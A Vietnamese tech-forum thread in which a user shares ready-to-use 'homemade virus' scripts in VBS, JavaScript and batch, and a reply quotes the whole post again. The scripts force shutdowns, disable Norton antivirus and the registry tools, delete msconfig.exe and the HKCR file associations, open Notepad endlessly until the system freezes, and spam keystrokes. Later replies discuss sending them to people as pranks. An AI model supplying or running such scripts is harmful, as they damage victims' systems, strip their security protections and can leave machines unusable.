Kiến thức tổng hợp về tin học, giới thiệu chia sẻ thủ thuật...
By viem_anhcothelamtatca1102
#606365 Tự làm ấy 1 con VR rất đơn giản ,hôm nay slm sẽ hướng dẫn các bạn.

Đầu tiên các bạn mở notepad và chọn một trong những đoạn mã sau, các bạn copy đoạn mã vào notepad và lưu dưới đuôi VBS. ví dụ: slm.vbs chảng hạn..


* mở ra một thông điệp vui sau đó sẽ tắt máy tính

CODE


Code:

@echo off

msg * em la slm ,bb anh!

shutdown -c "virus slm" -s -t 10

Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hay Javascript rồi:


Dưới đây là code của một số con virus nhỏ dưới dạng VBS:


1.Không cho victim khởi động máy:


Code:


Code:

Dim wsh

Set wsh = createobject("wscript.shell")

wsh.run "RUNDLL32.EXE user.exe,exitwindows"


2. Disable NAV:


Code:


Code:

Dim wsh

Set wsh= CreateObject( "WScript.Shell")

s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic

es\Norton Program

Scheduler\Start"

wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:


Code:


Code:

dim wsh

Set wsh = CreateObject( "WScript.Shell" )

s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win

Logon\"

s2 = "LegalNoticeCaption"

s3 = "LegalNoticeText"

wsh.RegWrite s1+s2, "http://allformy.topcities.com"

wsh.RegWrite s1+s3, "Hi ! Toi la SLM- Toi den tu truongton.net"


4. Hiển thị một dòng lệnh khi click vào file hay folder:,Code:

Code:

set reg=createobject("WScript.shell")

reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu truongton.net"

reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu truongton.net\","SLM"


5. Làm cho các trò trên hoạt động bình thường:


Code:


Code:

Dim objShell

Set objShell = CreateObject( "WScript.Shell" )

s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\

"

s2 = "Policies\System\DisableRegistryTools"

objShell.RegWrite s1+s2,1, "REG_DWORD"


Dưới dạng Javascipt :


Code:


Code:

var wsh;

wsh=new ActiveXObject ("Wscript.shell");// Winlogon when rebootvar s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion

\\WinLogon\\";

var s2 = "LegalNoticeCaption";

var s3 = "LegalNoticeText";

wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;

wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;


//Disable Registry

var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers

ion\\";

var s2 = "Policies\\System\\DisableRegistryTools" ;

wsh.RegWrite (s1+s2,0,"REG_DWORD");


//Delete file Msconfig.exe

Code:


Code:

var fso;

fso=new ActiveXObject("Scripting.FileSystemObject");

var fe=fso.getfile("C:\\windows\\msconfig.exe);

fe.delete true;//Shutdown windows


//Disable Mouse


wsh.run ("RUNDLL32.EXE mouse,disable");//Hang up windows


wsh.run ("rundll32 user,disableoemlayer");

Xóa khóa Registry Files

* xóa các tập tin registry key, sau đó lặp lại một tin nhắn


CODE


Code:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO slm chuc anh 1 ngay vui ve.

GOTO MESSAGE

-Endless Notepads

* Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *
CODE


Code:

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

-Crazy caps lock

* không ngừng quay caps lock và tắt nhanh chóng liên tục *CODE


Code:

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop


--Endless ENter

* Ép enter liên tục


CODE


Code:

Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop

--Endless Backspace

* làm cho phím backspace liên tục bị ép *


CODE


Code:

MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop


* làm cho ổ đĩa CD liên tục vọt ra *


CODE


Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 100

loop

Tất cả các code trên lưu với đuôi VBS


Còn những cái này lưu dưới dạng slm.bat(đuôi .bat)


Lặp lại n lần chu kỳ messCode:

@ECHO off

:Begin

msg * Hi

msg * khoe không anh ?

msg * em slm ne

msg * buon ngu chua?

msg * tat may ngu thoi ,bb anh

GOTO BEGIN

Auto shutdown


Code:

@echo off

msg * slm yeu anh

shutdown -c “Error! tạm biet anh!” -s


---Ai không làm được Phần mềm mình sẽ help!!!
By Carlo
By dohai_kxd
#606500 cái này có gì đâu hả bạn nếu mà bạn dùng bất kì trình diệt vỉut nào thì chỉ cần vừa tạo xong là nó xóa luôn...??? cái này mà cũng post lên cũ rùi bạn ơi ...
By Herlbert
#606514 Tự làm ấy 1 con VR rất đơn giản ,hôm nay slm sẽ hướng dẫn các bạn.

Đầu tiên các bạn mở notepad và chọn một trong những đoạn mã sau, các bạn copy đoạn mã vào notepad và lưu dưới đuôi VBS. ví dụ: slm.vbs chảng hạn..


* mở ra một thông điệp vui sau đó sẽ tắt máy tính

CODE


Code:

@echo off

msg * em la slm ,bb anh!

shutdown -c "virus slm" -s -t 10

Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hay Javascript rồi:


Dưới đây là code của một số con virus nhỏ dưới dạng VBS:


1.Không cho victim khởi động máy:


Code:


Code:

Dim wsh

Set wsh = createobject("wscript.shell")

wsh.run "RUNDLL32.EXE user.exe,exitwindows"


2. Disable NAV:


Code:


Code:

Dim wsh

Set wsh= CreateObject( "WScript.Shell")

s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic

es\Norton Program

Scheduler\Start"

wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:


Code:


Code:

dim wsh

Set wsh = CreateObject( "WScript.Shell" )

s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win

Logon\"

s2 = "LegalNoticeCaption"

s3 = "LegalNoticeText"

wsh.RegWrite s1+s2, "http://allformy.topcities.com"

wsh.RegWrite s1+s3, "Hi ! Toi la SLM- Toi den tu truongton.net"


4. Hiển thị một dòng lệnh khi click vào file hay folder:,Code:

Code:

set reg=createobject("WScript.shell")

reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu truongton.net"

reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu truongton.net\","SLM"


5. Làm cho các trò trên hoạt động bình thường:


Code:


Code:

Dim objShell

Set objShell = CreateObject( "WScript.Shell" )

s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\

"

s2 = "Policies\System\DisableRegistryTools"

objShell.RegWrite s1+s2,1, "REG_DWORD"


Dưới dạng Javascipt :


Code:


Code:

var wsh;

wsh=new ActiveXObject ("Wscript.shell");// Winlogon when rebootvar s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion

\\WinLogon\\";

var s2 = "LegalNoticeCaption";

var s3 = "LegalNoticeText";

wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;

wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;


//Disable Registry

var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers

ion\\";

var s2 = "Policies\\System\\DisableRegistryTools" ;

wsh.RegWrite (s1+s2,0,"REG_DWORD");


//Delete file Msconfig.exe

Code:


Code:

var fso;

fso=new ActiveXObject("Scripting.FileSystemObject");

var fe=fso.getfile("C:\\windows\\msconfig.exe);

fe.delete true;//Shutdown windows


//Disable Mouse


wsh.run ("RUNDLL32.EXE mouse,disable");//Hang up windows


wsh.run ("rundll32 user,disableoemlayer");

Xóa khóa Registry Files

* xóa các tập tin registry key, sau đó lặp lại một tin nhắn


CODE


Code:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO slm chuc anh 1 ngay vui ve.

GOTO MESSAGE

-Endless Notepads

* Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *
CODE


Code:

@ECHO off

:top

START %SystemRoot%\system32
otepad.exe

GOTO top

-Crazy caps lock

* không ngừng quay caps lock và tắt nhanh chóng liên tục *CODE


Code:

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop


--Endless ENter

* Ép enter liên tục


CODE


Code:

Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop

--Endless Backspace

* làm cho phím backspace liên tục bị ép *


CODE


Code:

MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop


* làm cho ổ đĩa CD liên tục vọt ra *


CODE


Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 100

loop

Tất cả các code trên lưu với đuôi VBS


Còn những cái này lưu dưới dạng slm.bat(đuôi .bat)


Lặp lại n lần chu kỳ messCode:

@ECHO off

:Begin

msg * Hi

msg * khoe không anh ?

msg * em slm ne

msg * buon ngu chua?

msg * tat may ngu thoi ,bb anh

GOTO BEGIN

Auto shutdown


Code:

@echo off

msg * slm yeu anh

shutdown -c “Error! tạm biet anh!” -s


---Ai không làm được Phần mềm mình sẽ help!!! anh có thể chỉ rõ cho em được không
By hoai_thu599
#606516 Cúng có sáng tạo..mình không click vào notepad thì sao bị .. mà đã gọi là vui thì không gây hại .. mà chỉ khiến người khác tức. dùng cái này chêu người thì hay .. nhưng mà gửi cho ai đó qua yahoo thì khó mà lừa được người ta vì nó ở dạng notepad ai chẳng nghi ngờ
Kết nối đề xuất:
Learn Synonym
Advertisement